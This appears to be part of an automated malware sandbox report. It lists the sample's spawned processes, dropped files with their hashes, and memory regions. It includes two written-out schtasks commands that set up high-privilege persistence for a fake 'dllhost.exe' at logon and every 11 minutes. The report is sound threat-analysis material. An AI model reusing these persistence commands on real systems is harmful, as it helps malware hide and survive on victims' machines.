C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\System\ja-JP\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\System\ja-JP\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Refsessionhostsvc\Mt3oQdLiTdARVFkfXUV4PhdFy7ms.vbeFilesize
200B
MD5715b2a98be54f767bdfdb5bf7dbf2197
SHA17e87dfe6185d6a9cdd62f52739505735c6f0acc2
SHA25685c764243e776ce9378aa2c8cbcce84372a4ae3343d77eafd0311edba57d62a0
SHA512e4fa22f41ef72d0d6f55b344f2b37115f7866abc89eff6d607c70c55e10156a9a2f0748991f29b550bac4f5a931b28dfdf382ca3cbfb55cfbdedf2a9355fc36b
-
C:\Refsessionhostsvc\OfficeClickToRun.exeFilesize
1.3MB
MD5ee7ee2d8c3fb2ebd214dacc15f0adbb7
SHA1828d6f11b6b2d9dfb3a22f7521e21301806c1f34
SHA25673950dbcbe7037c09a2d06bb55d31d62a4967ff5ab20a83655d6c4a83ee9625d
SHA51261a55dc0c116b6312a1f0306e4668d03e3fdbdd898c71b88b999f7a3e20a36b9184ff3a179303114667722a5528ac408a50b6c4746731431e933e3e4c5417dad
-
C:\Refsessionhostsvc\OfficeClickToRun.exeFilesize
1.3MB
MD5ee7ee2d8c3fb2ebd214dacc15f0adbb7
SHA1828d6f11b6b2d9dfb3a22f7521e21301806c1f34
SHA25673950dbcbe7037c09a2d06bb55d31d62a4967ff5ab20a83655d6c4a83ee9625d
SHA51261a55dc0c116b6312a1f0306e4668d03e3fdbdd898c71b88b999f7a3e20a36b9184ff3a179303114667722a5528ac408a50b6c4746731431e933e3e4c5417dad
-
C:\Refsessionhostsvc\dJGhX.batFilesize
32B
MD5619f332557884da3170d6c92e23a08c1
SHA14807c5257d56a46235581bdb6ccfa8af769aaadc
SHA25663a9884ccd883aec12da917966ce5bae1c5f83c4230f54a86faaa192101f0c86
SHA5128da3fecc43ca0a0f60209b2dccb86c19ca8c22855e932d1b88c16e6474d34d3230c4efaeea9035571ed61bf1854358b5cd75c6e56cba61a1bb78135d0d650530
-
C:\Refsessionhostsvc\msCrt.exeFilesize
1.3MB
MD5ee7ee2d8c3fb2ebd214dacc15f0adbb7
SHA1828d6f11b6b2d9dfb3a22f7521e21301806c1f34
SHA25673950dbcbe7037c09a2d06bb55d31d62a4967ff5ab20a83655d6c4a83ee9625d
SHA51261a55dc0c116b6312a1f0306e4668d03e3fdbdd898c71b88b999f7a3e20a36b9184ff3a179303114667722a5528ac408a50b6c4746731431e933e3e4c5417dad
-
C:\Refsessionhostsvc\msCrt.exeFilesize
1.3MB
MD5ee7ee2d8c3fb2ebd214dacc15f0adbb7
SHA1828d6f11b6b2d9dfb3a22f7521e21301806c1f34
SHA25673950dbcbe7037c09a2d06bb55d31d62a4967ff5ab20a83655d6c4a83ee9625d
SHA51261a55dc0c116b6312a1f0306e4668d03e3fdbdd898c71b88b999f7a3e20a36b9184ff3a179303114667722a5528ac408a50b6c4746731431e933e3e4c5417dad
-
C:\Refsessionhostsvc\msCrt.exeFilesize
1.3MB
MD5ee7ee2d8c3fb2ebd214dacc15f0adbb7
SHA1828d6f11b6b2d9dfb3a22f7521e21301806c1f34
SHA25673950dbcbe7037c09a2d06bb55d31d62a4967ff5ab20a83655d6c4a83ee9625d
SHA51261a55dc0c116b6312a1f0306e4668d03e3fdbdd898c71b88b999f7a3e20a36b9184ff3a179303114667722a5528ac408a50b6c4746731431e933e3e4c5417dad
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msCrt.exe.logFilesize
1KB
MD5bbb951a34b516b66451218a3ec3b0ae1
SHA17393835a2476ae655916e0a9687eeaba3ee876e9
SHA256eb70c64ae99d14ac2588b7a84854fbf3c420532d7fe4dfd49c7b5a70c869943a
SHA51263bcbfcf8e7421c66855c487c31b2991a989bdea0c1edd4c40066b52fa3eb3d9d37db1cd21b8eb4f33dd5870cc20532c8f485eab9c0b4f6b0793a35c077f2d6f
-
C:\Users\Public\ali.lnkFilesize
1008B
MD5f51e76f75ba4b8196a1e1cc68672e822
SHA1dde54d73c63ada116aa7c86b8103f265a6a0ad48
SHA2569263bd004ecf82f87354827ad86eeee2a2f23e9201d8d29ebc21f3f57c19c9e8
SHA51266cd24ec8bcf4c1d6d4e72a49f2323e1fd9542df98317bacc6faf756986bbb91f6f195aff7b94fb3c422683e0d504c836bf1e8cc05b1b2ddd9ead4c999448521
-
C:\Users\Public\xczuy.exeFilesize
1.6MB
MD5c8ae3010b329c7a23fbf74e6970d51ae
SHA1ca4427123f468099ad2d80a6f48eba9ad9899ed3
SHA2566ce2ef7081fdff206c456b6af0e4ee964a08ce0d802b41db703df00808140e7c
SHA512877de3884ac61d11f969e85e42a8479c9df6ec9dd81a16c024596482575eee22b2f87d544a52fe574e803cee4db517226b92e2808084720302c0d22c6b5dbb4a
-
C:\Users\Public\xczuy.exeFilesize
1.6MB
MD5c8ae3010b329c7a23fbf74e6970d51ae
SHA1ca4427123f468099ad2d80a6f48eba9ad9899ed3
SHA2566ce2ef7081fdff206c456b6af0e4ee964a08ce0d802b41db703df00808140e7c
SHA512877de3884ac61d11f969e85e42a8479c9df6ec9dd81a16c024596482575eee22b2f87d544a52fe574e803cee4db517226b92e2808084720302c0d22c6b5dbb4a
-
memory/1088-151-0x0000000000000000-mapping.dmp
-
memory/1152-149-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmpFilesize
10.8MB
-
memory/1152-143-0x0000000000000000-mapping.dmp
-
memory/1152-144-0x000001DDF41E0000-0x000001DDF4202000-memory.dmpFilesize
136KB
-
memory/1152-145-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmpFilesize
10.8MB
-
memory/1152-146-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmpFilesize
10.8MB
-
memory/1192-141-0x0000000000000000-mapping.dmp
-
memory/1216-139-0x0000000000000000-mapping.dmp
-
memory/1592-174-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmpFilesize
64KB
-
memory/1592-175-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmpFilesize
64KB
-
memory/1592-133-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmpFilesize
64KB
-
memory/1592-132-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmpFilesize
64KB
-
memory/1592-134-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmpFilesize
64KB
-
memory/1592-137-0x00007FFA174D0000-0x00007FFA174E0000-memory.dmpFilesize
64KB
-
memory/1592-136-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmpFilesize
64KB
-
memory/1592-135-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmpFilesize
64KB
-
memory/1592-138-0x00007FFA174D0000-0x00007FFA174E0000-memory.dmpFilesize
64KB
-
memory/1592-177-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmpFilesize
64KB
-
memory/1592-176-0x00007FFA19C70000-0x00007FFA19C80000-memory.dmpFilesize
64KB
-
memory/2936-171-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmpFilesize
10.8MB
-
memory/2936-172-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmpFilesize
10.8MB
-
memory/2936-167-0x0000000000000000-mapping.dmp
-
memory/2968-162-0x0000000000000000-mapping.dmp
-
memory/2968-170-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmpFilesize
10.8MB
-
memory/2968-166-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmpFilesize
10.8MB
-
memory/3200-154-0x0000000000000000-mapping.dmp
-
memory/3744-165-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmpFilesize
10.8MB
-
memory/3744-161-0x000000001C460000-0x000000001C988000-memory.dmpFilesize
5.2MB
-
memory/3744-160-0x0000000002E80000-0x0000000002ED0000-memory.dmpFilesize
320KB
-
memory/3744-159-0x00007FFA2E2A0000-0x00007FFA2ED61000-memory.dmpFilesize
10.8MB
-
memory/3744-158-0x00000000009C0000-0x0000000000B10000-memory.dmpFilesize
1.3MB
-
memory/3744-155-0x0000000000000000-mapping.dmp
-
memory/3964-147-0x0000000000000000-mapping.dmp
-
memory/4208-142-0x0000000000000000-mapping.dmp